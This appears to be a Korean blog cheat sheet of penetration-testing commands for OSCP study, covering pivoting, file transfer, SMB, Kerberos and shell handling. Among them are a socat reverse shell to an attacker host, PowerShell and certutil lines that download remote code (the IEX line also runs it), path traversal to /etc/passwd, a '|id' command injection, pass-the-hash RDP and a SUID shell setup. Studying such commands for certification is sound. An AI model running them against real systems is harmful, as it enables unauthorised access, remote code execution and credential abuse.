반응형
명령어
기본
curl
curl -v http://<RHOST>
curl -k <RHOST>
curl -X POST http://<RHOST>
curl -I POST http://<RHOST>
curl -X PUT http://<RHOST>
curl -vvv <RHOST>
curl --head http://<RHOST>/
curl --proxy http://127.0.0.1:8080
curl -X POST http://<RHOST>/select --data 'db=whatever|id'
curl --path-as-is http://<RHOST>/../../../../../../etc/passwd
curl -s "http://<RHOST>/reports.php?report=2589" | grep Do -A8 | html2textChisel
Reverse Pivot
./chisel server -p 9002 -reverse -v
./chisel client <RHOST>:9002 R:9003:127.0.0.1:8888SOCKS5 / 프록시체인 구성
./chisel server -p 9002 -reverse -v
./chisel client <RHOST>:9002 R:socks파일 전송
Certutil
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>Netcat
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>Impacket
sudo python3 impacket/examples/smbserver.py <SHARE> ./
sudo impacket-smbserver <SHARE> . -smb2supportcopy * \\<LHOST>\<SHARE>
powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE>
IEX(IWR http://<LHOST>/<FILE>) -UseBasicParsing)Bash 전용
wget version
Paste directly to the shell.
function __wget() {
: ${DEBUG:=0}
local URL=$1
local tag="Connection: close"
local mark=0
if [ -z "${URL}" ]; then
printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
"${FUNCNAME[0]}" "${FUNCNAME[0]}"
return 1;
fi
read proto server path <<<$(echo ${URL//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
[[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
[[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
[[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
while read line; do
[[ $mark -eq 1 ]] && echo $line
if [[ "${line}" =~ "${tag}" ]]; then
mark=1
fi
done <&3
exec 3>&-
}__wget http://<LHOST>/<FILE>curl version
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}__curl http://<LHOST>/<FILE> > <OUTPUT_FILE>Kerberos
sudo apt-get install krb5-kdc/etc/krb5.conf // kerberos configuration file location
kinit <USERNAME> // creating ticket request
klist // show available kerberos tickets
kdestroy // delete cached kerberos tickets
.k5login // resides kerberos principals for login (place in home directory)
krb5.keytab // "key table" file for one or more principals
kadmin // kerberos administration console
add_principal <EMAIL> // add a new user to a keytab file
ksu // executes a command with kerberos authentication
klist -k /etc/krb5.keytab // lists keytab file
kadmin -p kadmin/<EMAIL> -k -t /etc/krb5.keytab // enables editing of the keytab fileLigolo-ng
프록시 및 에이전트 다운로드
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz터널 접속 준비
sudo ip tuntap add user $(whoami) mode tun ligolosudo ip link set ligolo up공격자 시스템에 프록시 설정
./proxy -laddr <LHOST>:443 -selfcert대상 시스템에 에이전트 설정
./agent -connect <LHOST>:443 -ignore-cert세션
ligolo-ng » session[Agent : user@target] » ifconfigsudo ip r add 172.16.1.0/24 dev ligolo[Agent : user@target] » startLinux
CentOS
doas -u <USERNAME> /bin/sh환경 변수 설정
export PATH=`pwd`:$PATHgcc
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.cgetfacl
getfacl <LOCAL_DIRECTORY>iconv
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
iconv -f ASCII -t UTF-16LE <FILE>.txt | base64 | tr -d "\n"vi
:w !sudo tee % # save file with elevated privileges without exitingWindows 명령 형식
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0Microsoft Windows
dir
dir flag* /s /p
dir /s /b *.logPHP Webserver
sudo php -S 127.0.0.1:80Ping
ping -c 1 <RHOST>
ping -n 1 <RHOST>Python Webserver
sudo python -m SimpleHTTPServer 80
sudo python3 -m http.server 80RDP
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> +clipboard
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /h:1010 /w:1920
rdesktop <RHOST>showmount
/usr/sbin/showmount -e <RHOST>
sudo showmount -e <RHOST>
chown root:root sid-shell; chmod +s sid-shellsmbclient
smbclient -L \\<RHOST>\ -N
smbclient -L //<RHOST>/ -N
smbclient -L ////<RHOST>/ -N
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient "\\\\<RHOST>\<SHARE>"
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
smbclient --no-pass //<RHOST>/<SHARE>
mount.cifs //<RHOST>/<SHARE> /mnt/remote
guestmount --add '/<MOUNTPOINT>/<DIRECTORY/FILE>' --inspector --ro /mnt/<MOUNT> -v한 번에 여러 파일 다운로드
mask""
recurse ON
prompt OFF
mget *socat
socat TCP-LISTEN:<LPORT>,fork TCP:<RHOST>:<RPORT>socat file:`tty`,raw,echo=0 tcp-listen:<LPORT>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>socat tcp-listen:5986,reuseaddr,fork tcp:<RHOST>:9002
socat tcp-listen:9002,reuseaddr,fork tcp:192.168.122.228:5968 &SSH
ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh -R 8080:<LHOST>:80 <RHOST>
ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST>
ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST>
ssh -L 80:<LHOST>:80 <RHOST>
ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST>
ssh -L 80:localhost:80 <RHOST>시간과 날짜
서버 시간 가져오기
sudo nmap -sU -p 123 --script ntp-info <RHOST>시간 동기화를 중지하려면 virtualbox-guest-utils를 중지하세요.
sudo /etc/init.d/virtualbox-guest-utils stop자동 동기화 비활성화
sudo systemctl disable --now chronyd날짜 및 시간 설정 옵션
sudo net time -c <RHOST>
sudo net time set -S <RHOST>
sudo ntpdate -s <RHOST>
sudo ntpdate -b -u <RHOST>
sudo timedatectl set-timezone UTC
sudo timedatectl list-timezones
sudo timedatectl set-timezone '<COUNTRY>/<CITY>'
sudo timedatectl set-time 15:58:30
sudo timedatectl set-time '2015-11-20 16:14:50'
sudo timedatectl set-local-rtc 1서버와 동기화 유지
while [ 1 ]; do sudo ntpdate <RHOST>;doneTmux
ctrl b + w # show windows
ctrl + " # split window horizontal
ctrl + % # split window vertical
ctrl + , # rename window
ctrl + { # flip window
ctrl + } # flip window
ctrl + spacebar # switch pane layoutCopy & Paste
:setw -g mode-keys vi
ctrl b + [
space
enter
ctrl b + ]Search
ctrl b + [ # enter copy
ctrl + / # enter search while within copy mode for vi mode
n # search next
shift + n # reverse searchLogging
ctrl b
shift + P # start / stopSave Output
ctrl b + :
capture-pane -S -
ctrl b + :
save-buffer <FILE>.txt쉘 업데이트
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg
Enter
Enter
export XTERM=xtermVirtualBox
sudo pkill VBoxClient && VBoxClient --clipboardvirtualenv
sudo apt-get install virtualenv
virtualenv -p python2.7 venv
. venv/bin/activatepython.exe -m pip install virtualenv
python.exe -m virtualenv venv
venv\Scripts\activate반응형
'OSCP > 기초' 카테고리의 다른 글
| [OSCP] 명령어 - 정보 수집 단계 (0) | 2023.04.21 |
|---|---|
| [OSCP] Swaks - 스와크 (0) | 2023.04.21 |
| [OSCP] CyberChef (암호화, 인코딩, 압축 및 데이터 분석을 위한 웹 앱) (0) | 2023.04.21 |
| [OSCP] Chisel (0) | 2023.04.21 |
